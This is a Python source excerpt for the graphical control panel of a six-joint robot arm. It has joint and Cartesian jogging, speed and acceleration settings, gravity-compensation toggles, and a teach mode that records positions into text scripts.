Image_path = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
print(Image_path)
current_frame = 0 # tells us what frame is active. Move, log, teach...
acc_set = 45 # preset to some value; these are % from min to max acceleration
spd_set = 25 # preset to some value; these are % from min to max speed
Enable_disable = False # True is for operating / False is for stopped
gravity_disable_var = True # True is for gravity comp mode / False is for disabled
Execute_stop_var = True # True is for stop / False is for execute
Now_open = ''
robot_arm = rp.models.DH.CM6()
# p1 = Speed_setpoint
# p2 = acc_setpoint
# p3 = translations
# p4 = left_btns
# p5 = right_btns
# p6 = motor_positions(encoder_ticks)
# p7 = Real RAD angle
# p8 = Current
# p9 = Temperature
# p10 = Robot_pose
# p11 = grav_pos_flag
# p12 = software_control_variables
# p13 = Steer_K1
# p14 = Steer_K2
# p15 = Steer_K3
# p16 = Steer_K4
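# The p1..p16 arguments are the shared multiprocessing values/arrays created in the __main__ block below; the GUI process only reads and writes them, while the do_stuff process handles the actual serial I/O.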
def Tkinter_GUI(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16):
# When button is pressed raise selected frame
def raise_frame(frame,button1,button2,button3,button4,name):
global current_frame
current_frame = name
if name == 'move':
p12[1] = 0
if name == 'log':
p12[1] = 1
if name == 'teach':
p12[1] = 2
if name == 'setup':
p12[1] = 3
# https://www.tutorialspoint.com/python/tk_relief.htm
button1.config(relief='sunken',bg = main_color) #,borderwidth=3
button2.config(relief='raised',bg = "white")
button3.config(relief='raised',bg = "white")
button4.config(relief='raised',bg = "white")
frame.tkraise()
def move_frame_stuff():
################ Speed and acceleration setup canvas #########
# This segment creates speed and acceleration controls
# They are adjusted by % and shown in RPM and RAD/S² for single joint movement
# and in m/s and m/s² for translation movements
speed_canvas = tk.Canvas(move_frame, width=1400, height=80,bg = "white",borderwidth=6, relief='ridge')
speed_canvas.place(x = 0, y = 0)
# This is used to show how fast the robot will move when performing translational motion or rotation around its axes
speed_label = tk.Label(move_frame, text="Speed settings" ,font = (letter_font,18),bg = "white")
speed_label.place(x = 10, y = 10)
set_speed_RPM = tk.Label(move_frame, text="####" ,font = (letter_font,14),bg = "white")
set_speed_RPM .place(x = 500, y = 10)
set_speed_RAD = tk.Label(move_frame, text="####" ,font = (letter_font,14),bg = "white")
set_speed_RAD .place(x = 500, y = 35)
set_ACC_RAD = tk.Label(move_frame, text="####" ,font = (letter_font,14),bg = "white")
set_ACC_RAD .place(x = 500, y = 60)
# Set speed and acceleration when pressing buttons
def speed_acc_setup(var):
if var == 0:
p1.value = 25 # p1 is speed
p2.value = 40
elif var == 1:
p1.value = 50
p2.value = 50
elif var == 2:
p1.value = 80
p2.value = 55
# This will be for translations and rotations
#set_speed_RPM.configure(text = str(p1.value) + " RPM")
#set_speed_RAD.configure(text = str(p1.value) + " RAD/S")
#set_ACC_RAD.configure(text = str(p2.value) + " RAD/S²")
# This updates values for current desired speed and acceleration in GUI
for y in range(0,rbt.Joint_num):
btns_rads[y].configure(text = "Speed: " + str(round(np.interp(p1.value,[1,100],[rbt.Joint_min_speed[y],rbt.Joint_max_speed[y]]),4)) + " RAD/S")
btns_accel[y].configure(text = "Acceleration: " + str(round(np.interp(p2.value,[1,100],[rbt.Joint_min_acc[y],rbt.Joint_max_acc[y]]),4)) + " RAD/S²")
# Set Speed and acc with sliders
def set_speed_acc():
p1.value = spd_set # speed
p2.value = acc_set # acceleration
# This updates values for current desired speed and acceleration in GUI
for y in range(0,rbt.Joint_num):
btns_rads[y].configure(text = "Speed: " + str(round(np.interp(p1.value,[1,100],[rbt.Joint_min_speed[y],rbt.Joint_max_speed[y]]),4)) + " RAD/S")
btns_accel[y].configure(text = "Acceleration: " + str(round(np.interp(p2.value,[1,100],[rbt.Joint_min_acc[y],rbt.Joint_max_acc[y]]),4)) + " RAD/S²")
# This will be for translations and rotations
#set_speed_RPM.configure(text = str(round(rbt.RADS2_true_RPM(var_),4)) + " RPM")
#set_speed_RAD.configure(text = str(round(var_,4)) + " RAD/S")
#set_ACC_RAD.configure(text = str(round(var2_,4)) + " RAD/S²")
# Button for slow speed
spd_b_1 = tk.Button(move_frame, text = "Slow",bg = "white", font = (letter_font,18), width = 10, height = 1,borderwidth=3,command = lambda:speed_acc_setup(0))
spd_b_1.place(x = 195-180, y = 40)
# Button for default speed
spd_b_2 = tk.Button(move_frame, text = "Default",bg = "white", font = (letter_font,18), width = 10, height = 1,borderwidth=3,command = lambda:speed_acc_setup(1))
spd_b_2.place(x = 345-180, y = 40)
# Button for fast speed
spd_b_2 = tk.Button(move_frame, text = "Fast",bg = "white", font = (letter_font,18), width = 10, height = 1,borderwidth=3,command = lambda:speed_acc_setup(2))
spd_b_2.place(x = 495-180, y = 40)
# Button to set speed from sliders
set_btn = tk.Button(move_frame, text = "Set",bg = "white", font = (letter_font,18), width = 3, height = 1,borderwidth=3,command = lambda:set_speed_acc())
set_btn.place(x = 1320, y = 25)
################ Motor jog canvas ############################
jog_motors_canvas = tk.Canvas(move_frame, width=700, height=800,bg = "white",borderwidth=6, relief='ridge')
jog_motors_canvas.place(x = 0, y = 100)
btns_left = []
btns_right = []
btns_label = []
btns_rads = []
btns_accel = []
btn_nr = -1
global tk_left
image_left = Image.open(os.path.join(Image_path,'blue_arrow_left.png'))
tk_left = ImageTk.PhotoImage(image_left)
global tk_right
image_right = Image.open(os.path.join(Image_path,'blue_arrow_right.png'))
tk_right = ImageTk.PhotoImage(image_right)
robot_names = ['Base', 'Shoulder', 'Elbow', 'Wrist 1', 'Wrist 2', 'Wrist 3']
def button_press_left(event=None, var = 0):
p4[var] = 1
def button_rel_left(event=None, var = 0):
p4[var] = 0
def button_press_right(event=None, var = 0):
p5[var] = 1
def button_rel_right(event=None, var = 0):
p5[var] = 0
# https://stackoverflow.com/questions/14259072/tkinter-bind-function-with-variable-in-a-loop
for y in range(1,7):
btn_nr += 1
def make_lambda1(x):
return lambda ev:button_press_left(ev,x)
def make_lambda2(x):
return lambda ev:button_rel_left(ev,x)
def make_lambda3(x):
return lambda ev:button_press_right(ev,x)
def make_lambda4(x):
return lambda ev:button_rel_right(ev,x)
# Create buttons for jogging motors and labels for speed and acceleration
btns_label.append(tk.Label(move_frame, text=robot_names[btn_nr] ,font = (letter_font,16),bg = "white"))
btns_label[btn_nr].place(x = 17, y = 130+btn_nr*140)
btns_left.append(tk.Button(move_frame,image = tk_left,bg ="white",highlightthickness = 0,borderwidth=0))
btns_left[btn_nr].place(x = 150, y = 118+btn_nr*135)
btns_left[btn_nr].bind('<ButtonPress-1>',make_lambda1(btn_nr))
btns_left[btn_nr].bind('<ButtonRelease-1>',make_lambda2(btn_nr))
btns_right.append(tk.Button(move_frame,image = tk_right,bg ="white",highlightthickness = 0,borderwidth=0))
btns_right[btn_nr].place(x = 610, y = 118+btn_nr*135)
btns_right[btn_nr].bind('<ButtonPress-1>',make_lambda3(btn_nr))
btns_right[btn_nr].bind('<ButtonRelease-1>',make_lambda4(btn_nr))
btns_rads.append(tk.Label(move_frame, text= "Speed: " ,font = (letter_font,8,'bold'),bg = "white"))
btns_rads[btn_nr].place(x = 17, y = 165+btn_nr*140)
btns_accel.append(tk.Label(move_frame, text= "Acceleration: " ,font = (letter_font,8,'bold'),bg = "white"))
btns_accel[btn_nr].place(x = 17, y = 188+btn_nr*140)
set_speed_acc()
################ Translation canvas ##########################
jog_pose_canvas = tk.Canvas(move_frame, width=680, height=800,bg = "white",highlightthickness = 0,borderwidth=6, relief='ridge')
jog_pose_canvas.place(x = 720, y = 100)
global tk_xu
global tk_xd
global tk_yl
global tk_yr
global tk_zu
global tk_zd
ylevo = Image.open(os.path.join(Image_path,'ylevo.png'))
tk_yl = ImageTk.PhotoImage(ylevo)
ydesno = Image.open(os.path.join(Image_path,'ydesno.png'))
tk_yr = ImageTk.PhotoImage(ydesno)
xgore = Image.open(os.path.join(Image_path,'xgore.png'))
tk_xu = ImageTk.PhotoImage(xgore)
xdole = Image.open(os.path.join(Image_path,'xdole.png'))
tk_xd = ImageTk.PhotoImage(xdole)
zgore = Image.open(os.path.join(Image_path,'zgore.png'))
tk_zu = ImageTk.PhotoImage(zgore)
zdole = Image.open(os.path.join(Image_path,'zdole.png'))
tk_zd = ImageTk.PhotoImage(zdole)
translation_position = []
def translation_press(event=None,ax=0):
p3[ax] = 1
def translation_release(event=None,ax=0):
p3[ax] = 0
def make_lambda_press(x):
return lambda ev:translation_press(ev,x)
def make_lambda_release(x):
return lambda ev:translation_release(ev,x)
zu_button = tk.Button(move_frame, image=tk_zu,borderwidth=0,highlightthickness = 0,bg = 'white')
zu_button.place(x = 1160, y = 180-60)
zu_button.bind('<ButtonPress-1>',make_lambda_press(5))
zu_button.bind('<ButtonRelease-1>', make_lambda_release(5))
zd_button = tk.Button(move_frame, image=tk_zd,borderwidth=0,highlightthickness = 0,bg = 'white')
zd_button.place(x = 810, y = 180-60)
zd_button.bind('<ButtonPress-1>',make_lambda_press(4))
zd_button.bind('<ButtonRelease-1>', make_lambda_release(4))
yl_button = tk.Button(move_frame, image=tk_yl,borderwidth=0,highlightthickness = 0,bg = 'white')
yl_button.place(x = 810, y = 440-140)
yl_button.bind('<ButtonPress-1>',make_lambda_press(3))
yl_button.bind('<ButtonRelease-1>', make_lambda_release(3))
yr_button = tk.Button(move_frame, image=tk_yr,borderwidth=0,highlightthickness = 0,bg = 'white')
yr_button.place(x = 1160, y = 440-140)
yr_button.bind('<ButtonPress-1>',make_lambda_press(2))
yr_button.bind('<ButtonRelease-1>', make_lambda_release(2))
xu_button = tk.Button(move_frame, image=tk_xu,borderwidth=0,highlightthickness = 0,bg = 'white')
xu_button.place(x = 1090-100, y = 400-140)
xu_button.bind('<ButtonPress-1>',make_lambda_press(1))
xu_button.bind('<ButtonRelease-1>', make_lambda_release(1))
xd_button = tk.Button(move_frame, image=tk_xd,borderwidth=0,highlightthickness = 0,bg = 'white')
xd_button.place(x = 1060-100, y = 600-140)
xd_button.bind('<ButtonPress-1>',make_lambda_press(0))
xd_button.bind('<ButtonRelease-1>', make_lambda_release(0))
##############################################################
def log_frame_stuff():
# Here write code for log frame
None
def teach_frame_stuff():
gravity_hold_canvas_left = tk.Canvas(teach_frame, width=275, height=900,bg = "white",borderwidth=6, relief='ridge')
gravity_hold_canvas_left.place(x = 0, y = 0)
gravity_hold_canvas_right = tk.Canvas(teach_frame, width=275, height=900,bg = "white",borderwidth=6, relief='ridge')
gravity_hold_canvas_right.place(x = 290, y = 0)
save_canvas = tk.Canvas(teach_frame, width=550, height=280,bg = "white",borderwidth=6, relief='ridge')
save_canvas.place(x = 855, y = 620)
control_canvas_teach = tk.Canvas(teach_frame, width=265, height=900,bg = "white",borderwidth=6, relief='ridge')
control_canvas_teach.place(x = 580, y = 0)
gravity_l = tk.Label(teach_frame, text="Gravity compensation" ,font = (letter_font,17),bg = "white")
gravity_l.place(x = 20, y = 10)
position_l = tk.Label(teach_frame, text="Position hold" ,font = (letter_font,17),bg = "white")
position_l.place(x = 310, y = 10)
def open_txt():
global Now_open
mytext.delete('1.0', tk.END)
text_file = filedialog.askopenfilename(initialdir = Image_path + "/Programs",title = "open text file", filetypes = (("Text Files","*.txt"),))
print(text_file)
Now_open = text_file
text_file = open(text_file, 'r+')
stuff = text_file.read()
mytext.insert(tk.END,stuff)
text_file.close()
def save_txt():
global Now_open
print(Now_open)
if Now_open != '':
print("done")
text_file = open(Now_open,'w+')
text_file.write(mytext.get(1.0,tk.END))
text_file.close()
else:
Now_open = Image_path + "/Programs/execute_script.txt"
text_file = open(Now_open,'w+')
text_file.write(mytext.get(1.0,tk.END))
text_file.close()
def save_as_txt():
var1 = entry_label.get()
text_file = open(Image_path + "/Programs/" + var1 +".txt",'w+')
text_file.write(mytext.get(1.0,tk.END))
text_file.close()
def record_position(mode_var):
if entry_label_duration.get() == '':
move_duration = str(4)
else:
move_duration = entry_label_duration.get()
string = mode_var + ',' #'pos,'
string = string + move_duration + ','
for y in range(0,rbt.Joint_num - 1):
string = string + str(round(p7[y],5)) + ','
string = string + str(round(p7[rbt.Joint_num-1],5)) #add last joint without "," at the end
string = string + ',\n'
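# The resulting script line looks like e.g. 'pos,4,0.1047,-1.5708,...,\n': mode, move duration in seconds, then one rounded joint angle in radians per joint.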
mytext.insert(tk.INSERT,string)
def record_delay():
if entry_label_delay.get() == '':
delay_time = 1.5
else:
delay_time = entry_label_delay.get()
mytext.insert(tk.INSERT,'delay,')
mytext.insert(tk.INSERT,str(delay_time))
mytext.insert(tk.INSERT,',\n')
p12[3] = 0
def execute_stuff():
global Now_open
data2save = mytext.get(1.0,tk.END)
p12[3] = 1
if Now_open != '':
text_file = open(Now_open,'w+')
text_file.write(data2save)
text_file.close()
text_file = open(Image_path + "/Programs/execute_script.txt",'w+')
text_file.write(data2save)
text_file.close()
else:
Now_open = Image_path + "/Programs/execute_script.txt"
text_file = open(Now_open,'w+')
text_file.write(data2save)
text_file.close()
def stop_execution():
p12[3] = 0
def pause_execution():
p12[3] = 2
mytext = tk.Text(teach_frame,width = 55, height = 30, font=("Helvetica", 13), bg ='gray')
mytext.place(x = 860, y = 10)
execute_button = tk.Button(teach_frame,text = "Execute",font = (letter_font,22), width = 7, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3, command = execute_stuff)
execute_button.place(x = 1250, y = 630)
stop_execution_button = tk.Button(teach_frame,text = "Stop",font = (letter_font,22), width = 7, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3, command = stop_execution)
stop_execution_button.place(x = 1250, y = 685)
pause_execution_button = tk.Button(teach_frame,text = "Pause",font = (letter_font,22), width = 7, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3, command = pause_execution)
pause_execution_button.place(x = 1250, y = 740)
open_button = tk.Button(teach_frame,text = "Open",font = (letter_font,22), width = 7, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = open_txt)
open_button.place(x = 1085, y = 630)
save_button = tk.Button(teach_frame,text = "Save",font = (letter_font,14,'bold'), width = 6, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = save_txt)
save_button.place(x = 865, y = 630)
save_as_button = tk.Button(teach_frame,text = "Save as",font = (letter_font,14,'bold'), width = 6, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = save_as_txt)
save_as_button.place(x = 975, y = 630)
p12[4] = 0
def Start_recording():
if p12[4] == 0:
start_recording_button.configure(bg ="green")
else:
start_recording_button.configure(bg ="ivory3")
p12[4] = not(p12[4])
def Stop_recording():
p12[4] = 0
start_recording_button.configure(bg ="ivory3")
p12[5] = 0
#def Execute_recording():
#if p12[5] == 0:
#execute_recording_button.configure(bg ="green")
#else:
#execute_recording_button.configure(bg ="ivory3")
#p12[5] = not(p12[5])
def Execute_recording():
p12[5] = 1
p12[6] = 0
def Show_recording():
p12[6] = 1
p12[7] = 0
def Clear_recording():
p12[7] = 1
start_recording_button = tk.Button(teach_frame,text = "Start REC",font = (letter_font,14), width = 9, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = Start_recording)
start_recording_button.place(x =870, y = 710)
stop_recording_button = tk.Button(teach_frame,text = "Stop REC",font = (letter_font,14), width = 9, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = Stop_recording)
stop_recording_button.place(x =870, y = 750)
execute_recording_button = tk.Button(teach_frame,text = "Execute REC",font = (letter_font,14), width = 9, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = Execute_recording)
execute_recording_button.place(x =870, y = 790)
show_recording_button = tk.Button(teach_frame,text = "Show REC",font = (letter_font,14), width = 9, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = Show_recording)
show_recording_button.place(x =870, y = 830)
Clear_recording_button = tk.Button(teach_frame,text = "Clear REC",font = (letter_font,14), width = 9, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = Clear_recording)
Clear_recording_button.place(x =870, y = 870)
entry_label = tk.Entry(teach_frame,font = (letter_font,14,'bold'), width = 15, borderwidth = 4,bg ="gray84")
entry_label.place(x =870, y = 675)
# Legacy stuff using GOTO position
# Command is pos
record_button_all = tk.Button(teach_frame,text = "Record all",font = (letter_font,19), width = 14, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = lambda: record_position('pos'))
record_button_all.place(x =20, y = 810)
record_button_free = tk.Button(teach_frame,text = "Record free",font = (letter_font,19), width = 14, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = lambda: record_position('pos'))
record_button_free.place(x =20, y = 860)
################################################
CSAAR_button = tk.Button(teach_frame,text = "CSAAR",font = (letter_font,19), width = 14, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = lambda: record_position('CSAAR'))
CSAAR_button.place(x =590, y = 70+43)
JTRAJ_button = tk.Button(teach_frame,text = "JTRAJ",font = (letter_font,19), width = 14, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = lambda: record_position('JTRAJ'))
JTRAJ_button.place(x =590, y = 70+90)
CTRAJ_button = tk.Button(teach_frame,text = "CTRAJ",font = (letter_font,19), width = 14, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = lambda: record_position('CTRAJ'))
CTRAJ_button.place(x =590, y = 70+90+47)
move_duration_l = tk.Label(teach_frame, text="Move duration" ,font = (letter_font,17),bg ="ivory3",highlightthickness = 0,borderwidth=3)
move_duration_l.place(x =590, y = 112-90)
entry_label_duration = tk.Entry(teach_frame,font = (letter_font,19,'bold'), width = 4, borderwidth = 4,bg ="gray84")
entry_label_duration.place(x =767, y = 110-90)
delay_button = tk.Button(teach_frame,text = "Delay",font = (letter_font,19), width = 9, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = record_delay)
delay_button.place(x =590, y = 155-90)
entry_label_delay = tk.Entry(teach_frame,font = (letter_font,19,'bold'), width = 4, borderwidth = 4,bg ="gray84")
entry_label_delay.place(x =767, y = 160-90)
def loop_command():
mytext.insert(tk.INSERT,'loop,\n')
def end_command():
mytext.insert(tk.INSERT,'end,\n')
end_button = tk.Button(teach_frame,text ="END",font = (letter_font,19), width = 6, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = end_command)
end_button.place(x =590, y = 855)
loop_button = tk.Button(teach_frame,text = "LOOP",font = (letter_font,19), width = 6, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = loop_command)
loop_button.place(x =720, y = 855)
def button_press_grav(event=None, var = 0):
grav_buttons[var].configure(bg ="green yellow")
pos_buttons[var].configure(bg ="ivory3")
p11[var] = 0
def button_press_pos(event=None, var = 0):
grav_buttons[var].configure(bg ="ivory3")
pos_buttons[var].configure(bg ="green yellow")
p11[var] = 1
def set_all(var):
if var == 'grav':
for y in range(0,6):
grav_buttons[y].configure(bg ="green yellow")
pos_buttons[y].configure(bg ="ivory3")
p11[y] = 0
if var == 'pos':
for y in range(0,6):
grav_buttons[y].configure(bg ="ivory3")
pos_buttons[y].configure(bg ="green yellow")
p11[y] = 1
def make_lambda_grav(x):
return lambda ev:button_press_grav(ev,x)
def make_lambda_pos(x):
return lambda ev:button_press_pos(ev,x)
robot_names_text = ['Base', 'Shoulder', 'Elbow', 'Wrist 1', 'Wrist 2', 'Wrist 3']
grav_buttons = []
pos_buttons = []
for cnt in range(0,6):
grav_buttons.append(tk.Button(teach_frame,text = robot_names_text[cnt],font = (letter_font,22), width = 9, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3))
grav_buttons[cnt].place(x = 7, y = 50+cnt*50)
grav_buttons[cnt].bind('<ButtonPress-1>',make_lambda_grav(cnt))
pos_buttons.append(tk.Button(teach_frame,text = robot_names_text[cnt],font = (letter_font,22), width = 9, height = 1,bg ="green yellow",highlightthickness = 0,borderwidth=3))
pos_buttons[cnt].place(x = 300, y = 50+cnt*50)
pos_buttons[cnt].bind('<ButtonPress-1>',make_lambda_pos(cnt))
grav_all=(tk.Button(teach_frame,text = "ALL",font = (letter_font,22), wraplength=1, width = 2, height = 8,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = lambda: set_all('grav')))
grav_all.place(x = 207, y = 50)
pos_all=(tk.Button(teach_frame,text = "ALL",font = (letter_font,22), wraplength=1, width = 2, height = 8,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = lambda: set_all('pos')))
pos_all.place(x = 500, y = 50)
gravity_disable_var = 1
p11[6] = gravity_disable_var
def switch_grav_disable():
global gravity_disable_var
if gravity_disable_var == 0:
grav_disable.configure(text = "Disable")
else:
grav_disable.configure(text = "Gravity")
gravity_disable_var = not(gravity_disable_var)
p11[6] = gravity_disable_var
grav_disable=(tk.Button(teach_frame,text = "Disable",font = (letter_font,22), width = 9, height = 1,bg ="ivory4",highlightthickness = 0,borderwidth=3,command = lambda: switch_grav_disable()))
grav_disable.place(x = 7, y = 355)
p12[2] = 1
def set_grav_pos():
p12[2] = not(p12[2])
set_motor_mode=(tk.Button(teach_frame,text = "Set",font = (letter_font,22), width = 9, height = 1,bg ="ivory4",highlightthickness = 0,borderwidth=3,command = lambda: set_grav_pos()))
set_motor_mode.place(x = 300, y = 355)
None
def setup_frame_stuff():
# Initialize K1,2,3,4 values to default ones
for y in range(0,rbt.Joint_num):
p13[y] = rbt.Steer_K1_default[y]
p14[y] = rbt.Steer_K2_default[y]
p15[y] = rbt.Steer_K3_default[y]
p16[y] = rbt.Steer_K4_default[y]
# When button is pressed change K1,2,3,4 values
def Change_compliance():
comp_temp = round(np.interp(Compliance_scale.get(), [0, 100], [18, 0.2]),3)
for y in range(0,rbt.Joint_num):
p13[y] = comp_temp
print(p13[y])
Current_compliance_label.configure(text="Current compliance K1 value: " + str(p13[0]) )
Compliance_setup_canvas = tk.Canvas(setup_frame, width=900, height=900,bg = "white",borderwidth=6, relief='ridge')
Compliance_setup_canvas.place(x = 0, y = 0)
Compliance_settings_l = tk.Label(setup_frame, text="Compliance settings" ,font = (letter_font,17),bg = "white")
Compliance_settings_l.place(x = 20, y = 10)
Compliance_scale = tk.Scale(setup_frame, label='Compliance in %. (100% being soft, 0 being stiff)', from_=0, to=100, orient = tk.HORIZONTAL,bg = "white",borderwidth=3,length = 400, font = (letter_font,11))
Compliance_scale.place(x = 23, y = 75)
Compliance_set_button = tk.Button(setup_frame,text = "Set",font = (letter_font,20),bg = "ivory3",command = lambda:Change_compliance())
Compliance_set_button.place(x = 350, y = 15)
Current_compliance_label = tk.Label(setup_frame, text="Current compliance K1 value: " + str(p13[0]), font = (letter_font,13),bg = "white")
Current_compliance_label.place(x = 20, y = 47)
letter_font = 'Courier New TUR' # letter font used
# http://www.science.smith.edu/dftwiki/index.php/Color_Charts_for_TKinter
main_color = 'gray63' # Color of background
root = tk.Tk()
root.wm_attributes("-topmost", 0)
root.title('ARM control')
root.configure(background = main_color)
# This maintains fixed size of 1920x1080
# while enabling to minimise and maximise
root.maxsize(1920,1080)
root.minsize(1920,1080)
root.geometry("1920x1080")
# Create frames for other windows
move_frame = tk.Frame(root, background = main_color)
move_frame.place(x=0, y=85, width=1420, height=1010)
log_frame = tk.Frame(root, background = main_color)
log_frame.place(x=0, y=85, width=1420, height=1010)
teach_frame = tk.Frame(root, background = main_color)
teach_frame.place(x=0, y=85, width=1420, height=1010)
setup_frame = tk.Frame(root, background = main_color)
setup_frame.place(x=0, y=85, width=1420, height=1010)
#Help image and button
image_help = Image.open(os.path.join(Image_path,'helpimg4.png'))
tk_image = ImageTk.PhotoImage(image_help)
help_button = tk.Button(root, image=tk_image,borderwidth=0,highlightthickness = 0,bg = main_color) #, command=lambda aurl=url_donate:OpenUrl_donate(aurl)
help_button.place(x = 1830, y = 0)
# Buttons for window select
control_canvas = tk.Canvas(root, width=470, height=900,bg = "white",borderwidth=6, relief='ridge')
control_canvas.place(x = 1420, y = 85)
positons_label = tk.Label(root, text="Tool position:" ,font = (letter_font,18),bg = "white")
positons_label.place(x = 1450, y = 10+85)
Enable_disable = 0 # 1 is for enabled, 0 is for disabled
p12[0] = Enable_disable
def Disable_Enable():
global Enable_disable
if Enable_disable == 0:
STOP_button.configure(image=tk_STOP)
else:
STOP_button.configure(image=tk_ENABLE)
Enable_disable = not(Enable_disable)
p12[0] = Enable_disable
image_STOP = Image.open(os.path.join(Image_path,'disable_img.png'))
image_ENABLE = Image.open(os.path.join(Image_path,'enable_img.png'))
tk_STOP = ImageTk.PhotoImage(image_STOP)
tk_ENABLE = ImageTk.PhotoImage(image_ENABLE)
# Button to stop robot
STOP_button = tk.Button(root, image=tk_ENABLE,borderwidth=0,highlightthickness = 0,bg = "white",command = lambda:Disable_Enable())
STOP_button.place(x = 1760, y = 30+85)
# Button to clear error
def Clear_error_command():
gt.Clear_Error(1)
gt.Clear_Error(2)
gt.Clear_Error(3)
gt.Clear_Error(4)
gt.Clear_Error(5)
gt.Clear_Error(6)
Clear_error_button = tk.Button(root,text = "Clear error",font = (letter_font,24),bg = "ivory3",command = Clear_error_command)
Clear_error_button.place(x = 1450, y = 270+85)
# Button to close gripper
Gripper_close_button = tk.Button(root,text = "Close gripper",font = (letter_font,20),bg = "ivory3")
Gripper_close_button.place(x = 1450, y = 370+85)
# Button to open gripper
Gripper_open_button = tk.Button(root,text = "Open gripper",font = (letter_font,20),bg = "ivory3")
Gripper_open_button.place(x = 1670, y = 370+85)
move_button = tk.Button(root, text = "Move", font = (letter_font,23), width = 15, height = 1,borderwidth=3,command = lambda: raise_frame(move_frame,move_button,log_button,teach_button,setup_button,'move'))
move_button.place(x = 0, y = 2)
log_button = tk.Button(root, text = "Log", font = (letter_font,23), width = 15, height = 1,borderwidth=3 ,command = lambda: raise_frame(log_frame,log_button,move_button,teach_button,setup_button,'log'))
log_button.place(x = 285, y = 2)
teach_button = tk.Button(root, text = "Teach", font = (letter_font,23), width = 15, height = 1,borderwidth=3 ,command = lambda: raise_frame(teach_frame,teach_button,log_button,move_button,setup_button,'teach'))
teach_button.place(x = 570, y = 2)
setup_button = tk.Button(root, text = "Setup", font = (letter_font,23), width = 15, height = 1,borderwidth=3 ,command = lambda: raise_frame(setup_frame,setup_button,log_button,teach_button,move_button,'setup'))
setup_button.place(x = 855, y = 2)
# Stuff that need constant updating and here we define it
btns_progress = []
btn_nr_ = -1
ticks_label = []
Deg_label = []
RAD_label = []
Temperature_label = []
Current_label = []
pos_labels = []
pos_labels2 = []
pos_text = ['X: ','Y: ','Z: ','phi: ','theta: ','psi: ']
# Euler angles tell us how to get from our static base frame to the frame the end-effector is in now.
# We do it by rotating by 'phi' around Z, then 'theta' around Y and then 'psi' around Z again.
robot_names = ['Base: ', 'Shoulder: ', 'Elbow: ', 'Wrist 1: ', 'Wrist 2: ', 'Wrist 3: ']
Data_ = "#####"
# Raise move frame as default
raise_frame(move_frame,move_button,setup_button,teach_button,log_button,'move')
p12[1] = 0
move_frame_stuff()
teach_frame_stuff()
log_frame_stuff()
setup_frame_stuff()
# Create scale that allows to set speed of joints
# Scales return value from 1-100
speed_scale = tk.Scale(move_frame, from_=1, to=100, orient = tk.HORIZONTAL,bg = "white",borderwidth=3,length = 300, font = (letter_font,11))
speed_scale.place(x = 1008, y = 33)
speed_scale.set(spd_set)
# Create scale that allows to set acceleration of joints
acc_scale = tk.Scale(move_frame, from_=1, to=100, orient = tk.HORIZONTAL,bg = "white",borderwidth=3,length = 300, font = (letter_font,11))
acc_scale.place(x = 688, y = 33)
acc_scale.set(acc_set)
speed_scale_l = tk.Label(move_frame, text="Speed [%]" ,font = (letter_font,13),bg = "white")
speed_scale_l.place(x = 1008, y = 8)
acc_scale_l = tk.Label(move_frame, text="Acceleration [%]" ,font = (letter_font,13),bg = "white")
acc_scale_l.place(x = 688, y = 8)
for y in range(1,7):
# Most of this stuff is labels for jog, these lables will be updating constantly
btn_nr_ += 1
ticks_label.append(tk.Label(move_frame, text="Encoder: " + Data_,font = (letter_font,12),bg = "white"))
ticks_label[btn_nr_].place(x = 250, y = 152+btn_nr_*135)
Deg_label.append(tk.Label(move_frame, text="Degree: " + Data_,font = (letter_font,12),bg = "white"))
Deg_label[btn_nr_].place(x = 250, y = 130+btn_nr_*135)
RAD_label.append(tk.Label(move_frame, text="Radians: " + Data_,font = (letter_font,12),bg = "white"))
RAD_label[btn_nr_].place(x = 250, y = 108+btn_nr_*135)
Temperature_label.append(tk.Label(move_frame, text="Temperature: " + Data_,font = (letter_font,12),bg = "white"))
Temperature_label[btn_nr_].place(x = 425, y = 130+btn_nr_*135)
Current_label.append(tk.Label(move_frame, text="Current: " + Data_,font = (letter_font,12),bg = "white"))
Current_label[btn_nr_].place(x = 425, y = 108+btn_nr_*135)
btns_progress.append(Progressbar(move_frame, orient = tk.HORIZONTAL, length = 350, mode = 'determinate'))
btns_progress[btn_nr_].place(x = 250, y = 180+btn_nr_*135)
pos_labels.append(tk.Label(root, text=pos_text[btn_nr_] + Data_,font = (letter_font,14),bg = "white"))
pos_labels[btn_nr_].place(x = 1450, y = 45+btn_nr_*35+ 85)
pos_labels2.append(tk.Label(root, text=robot_names[btn_nr_] + Data_,font = (letter_font,14),bg = "white"))
pos_labels2[btn_nr_].place(x = 1585, y = 45+btn_nr_*35+ 85)
#### Stuff that will need to be updated after some time e.g. progress bars, x,y,z values... #########
def Stuff_To_Update():
global spd_set, acc_set
spd_set = speed_scale.get()
acc_set = acc_scale.get()
acc_scale_l.configure(text = "Acceleration " + str(acc_set) + "%")
speed_scale_l.configure(text = "Speed " + str(spd_set) + "%")
#T = robot_arm.fkine(p7) # Calculate get homogenous transformation matrix for current joint angles
# Update motor pos for only joint_num available joints
for y in range(0,rbt.Joint_num):
btns_progress[y]["value"] = int(np.interp(p6[y],rbt.Joint_limits_ticks[y],[0,100]))
btns_progress[y].update()
